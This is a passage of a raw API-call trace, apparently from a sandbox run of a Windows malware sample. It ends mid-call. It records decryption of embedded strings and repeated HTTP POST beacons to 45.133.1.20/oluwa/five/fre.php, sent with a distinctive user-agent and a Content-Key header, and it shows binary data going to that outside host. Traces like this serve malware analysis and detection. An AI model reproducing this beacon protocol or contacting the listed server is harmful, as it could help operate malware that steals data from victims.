[0175.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0175.719] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1d0) returned 0x390 [0175.721] Sleep (dwMilliseconds=0xea60) [0175.723] GetProcessHeap () returned 0x6a0000 [0175.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0175.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.725] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.733] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0175.739] GetProcessHeap () returned 0x6a0000 [0175.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0175.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.741] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0175.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.742] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.743] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.743] GetProcessHeap () returned 0x6a0000 [0175.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0175.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.768] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0175.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.769] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0175.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.770] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0175.770] GetProcessHeap () returned 0x6a0000 [0175.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0175.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.771] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0175.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.774] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0175.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.775] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0175.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.776] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0175.776] GetProcessHeap () returned 0x6a0000 [0175.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0175.776] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0175.777] GetProcessHeap () returned 0x6a0000 [0175.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0175.778] GetProcessHeap () returned 0x6a0000 [0175.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0175.778] GetProcessHeap () returned 0x6a0000 [0175.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0175.778] GetProcessHeap () returned 0x6a0000 [0175.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0175.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.779] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.797] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0175.808] GetProcessHeap () returned 0x6a0000 [0175.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0175.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.810] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0175.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.811] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.812] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.812] GetProcessHeap () returned 0x6a0000 [0175.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0175.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.814] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0175.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.815] CryptDestroyKey (hKey=0x6ad020) returned 1 [0175.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.818] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0175.818] GetProcessHeap () returned 0x6a0000 [0175.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0175.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.819] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0175.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.820] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0175.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.821] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0175.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0175.822] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0175.822] GetProcessHeap () returned 0x6a0000 [0175.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0175.822] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8b0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0175.822] GetProcessHeap () returned 0x6a0000 [0175.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0175.822] socket (af=2, type=1, protocol=6) returned 0x394 [0175.822] connect (s=0x394, name=0x6be8b0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0175.850] FreeAddrInfoW (pAddrInfo=0x6bf490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8b0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0175.850] GetProcessHeap () returned 0x6a0000 [0175.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0175.850] GetProcessHeap () returned 0x6a0000 [0175.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0175.851] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0175.852] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0175.852] GetProcessHeap () returned 0x6a0000 [0175.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0175.853] GetProcessHeap () returned 0x6a0000 [0175.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0175.853] GetProcessHeap () returned 0x6a0000 [0175.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0175.853] GetProcessHeap () returned 0x6a0000 [0175.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0175.855] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0175.856] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0175.856] GetProcessHeap () returned 0x6a0000 [0175.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0175.856] GetProcessHeap () returned 0x6a0000 [0175.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0175.856] send (s=0x394, buf=0x6bbd20*, len=242, flags=0) returned 242 [0175.857] send (s=0x394, buf=0x6bb998*, len=159, flags=0) returned 159 [0175.857] GetProcessHeap () returned 0x6a0000 [0175.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0175.857] recv (in: s=0x394, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0175.954] GetProcessHeap () returned 0x6a0000 [0175.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0175.955] GetProcessHeap () returned 0x6a0000 [0175.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0175.956] GetProcessHeap () returned 0x6a0000 [0175.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0175.956] GetProcessHeap () returned 0x6a0000 [0175.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0175.957] closesocket (s=0x394) returned 0 [0175.957] GetProcessHeap () returned 0x6a0000 [0175.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0175.957] GetProcessHeap () returned 0x6a0000 [0175.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0175.958] GetProcessHeap () returned 0x6a0000 [0175.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0175.960] GetProcessHeap () returned 0x6a0000 [0175.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0175.961] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfb0) returned 0x394 [0175.963] Sleep (dwMilliseconds=0xea60) [0175.965] GetProcessHeap () returned 0x6a0000 [0175.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0175.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.966] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.977] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0175.989] GetProcessHeap () returned 0x6a0000 [0175.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0175.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.991] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0175.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.992] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.994] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.994] GetProcessHeap () returned 0x6a0000 [0175.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0175.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0175.995] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0176.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.005] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0176.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.007] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0176.007] GetProcessHeap () returned 0x6a0000 [0176.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0176.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.009] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0176.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.010] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0176.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.011] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0176.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.013] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0176.013] GetProcessHeap () returned 0x6a0000 [0176.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0176.013] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0176.013] GetProcessHeap () returned 0x6a0000 [0176.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0176.015] GetProcessHeap () returned 0x6a0000 [0176.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0176.016] GetProcessHeap () returned 0x6a0000 [0176.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0176.016] GetProcessHeap () returned 0x6a0000 [0176.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0176.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.017] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.023] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0176.029] GetProcessHeap () returned 0x6a0000 [0176.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0176.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.030] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0176.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.031] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.032] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.032] GetProcessHeap () returned 0x6a0000 [0176.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0176.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.034] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0176.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.035] CryptDestroyKey (hKey=0x6ad020) returned 1 [0176.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.039] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0176.039] GetProcessHeap () returned 0x6a0000 [0176.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0176.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.041] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0176.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.044] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0176.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.049] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0176.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0176.050] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0176.050] GetProcessHeap () returned 0x6a0000 [0176.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0176.050] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf990*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0176.050] GetProcessHeap () returned 0x6a0000 [0176.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0176.050] socket (af=2, type=1, protocol=6) returned 0x398 [0176.051] connect (s=0x398, name=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0176.076] FreeAddrInfoW (pAddrInfo=0x6bf990*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0176.076] GetProcessHeap () returned 0x6a0000 [0176.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0176.076] GetProcessHeap () returned 0x6a0000 [0176.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0176.077] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0176.077] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0176.077] GetProcessHeap () returned 0x6a0000 [0176.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0176.077] GetProcessHeap () returned 0x6a0000 [0176.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0176.078] GetProcessHeap () returned 0x6a0000 [0176.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0176.078] GetProcessHeap () returned 0x6a0000 [0176.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0176.079] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0176.082] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0176.082] GetProcessHeap () returned 0x6a0000 [0176.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0176.082] GetProcessHeap () returned 0x6a0000 [0176.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0176.082] send (s=0x398, buf=0x6bbd20*, len=242, flags=0) returned 242 [0176.083] send (s=0x398, buf=0x6bb998*, len=159, flags=0) returned 159 [0176.083] GetProcessHeap () returned 0x6a0000 [0176.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0176.083] recv (in: s=0x398, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0176.159] GetProcessHeap () returned 0x6a0000 [0176.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0176.161] GetProcessHeap () returned 0x6a0000 [0176.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0176.161] GetProcessHeap () returned 0x6a0000 [0176.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0176.162] GetProcessHeap () returned 0x6a0000 [0176.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0176.162] closesocket (s=0x398) returned 0 [0176.163] GetProcessHeap () returned 0x6a0000 [0176.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0176.163] GetProcessHeap () returned 0x6a0000 [0176.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0176.164] GetProcessHeap () returned 0x6a0000 [0176.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0176.164] GetProcessHeap () returned 0x6a0000 [0176.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0176.165] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x338) returned 0x398 [0176.166] Sleep (dwMilliseconds=0xea60) [0176.168] GetProcessHeap () returned 0x6a0000 [0176.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0176.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.170] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0176.181] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, 